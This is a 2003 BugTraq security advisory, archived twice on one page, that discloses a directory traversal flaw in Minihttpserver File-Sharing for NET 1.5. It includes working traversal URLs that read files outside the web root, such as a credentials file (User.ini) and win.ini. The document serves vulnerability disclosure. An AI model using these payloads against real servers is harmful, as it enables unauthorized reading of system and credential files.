BugTraq
Back to list
|
Post reply
Minihttpserver File-Sharing for NET Directory Traversal Vulnerability
Oct 03 2003 01:14PM
Bahaa Naamneh (b_naamneh hotmail com)
Minihttpserver File-Sharing for NET Directory Traversal Vulnerability
Affected Systems: File-Sharing for NET
version: 1.5 (and possibly earlier versions)
Vendor: Minihttpserver - http://www.minihttpserver.net
Issue: Directory Traversal Vulnerability
Released: 2 October 2003
Introduction:
=============
"File Sharing for net is a complete, secure web server that shares
your business documents and files over the web: remote users only
need browsers to view your files. Share, transfer files securely with
colleagues."
- Vendors Description
[ http://www.minihttpserver.net ]
Details:
========
File-Sharing for NET has a Directory Traversal Vulnerability Using
the string '../' or '..\' in a URL, an attacker can gain read access
to any file outside of the intended web-published file system
directory.
http://[target]/../../../existing_file
http://[target]\..\..\..\existing_file
Examples:
---------
http://127.0.0.1/../../../ Program Files/FileSharing for NET/User.ini
http://127.0.0.1/../../../windows/win.ini
Vendor status:
==============
The vendor has been informed, and they are fixing this bug.
The updated version, when released, can be downloaded from:
http://www.minihttpserver.net/fbbs.zip
Discovered by/Credit:
=====================
Bahaa Naamneh
b_naamneh (at) hotmail (dot) com [email concealed]
http://www.bsecurity.tk
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Minihttpserver File-Sharing for NET Directory Traversal Vulnerability
Affected Systems: File-Sharing for NET
version: 1.5 (and possibly earlier versions)
Vendor: Minihttpserver - http://www.minihttpserver.net
Issue: Directory Traversal Vulnerability
Released: 2 October 2003
Introduction:
=============
"File Sharing for net is a complete, secure web server that shares
your business documents and files over the web: remote users only
need browsers to view your files. Share, transfer files securely with
colleagues."
- Vendors Description
[ http://www.minihttpserver.net ]
Details:
========
File-Sharing for NET has a Directory Traversal Vulnerability Using
the string '../' or '..\' in a URL, an attacker can gain read access
to any file outside of the intended web-published file system
directory.
http://[target]/../../../existing_file
http://[target]\..\..\..\existing_file
Examples:
---------
http://127.0.0.1/../../../ Program Files/FileSharing for NET/User.ini
http://127.0.0.1/../../../windows/win.ini
Vendor status:
==============
The vendor has been informed, and they are fixing this bug.
The updated version, when released, can be downloaded from:
http://www.minihttpserver.net/fbbs.zip
Discovered by/Credit:
=====================
Bahaa Naamneh
b_naamneh (at) hotmail (dot) com [email concealed]
http://www.bsecurity.tk
[ reply ]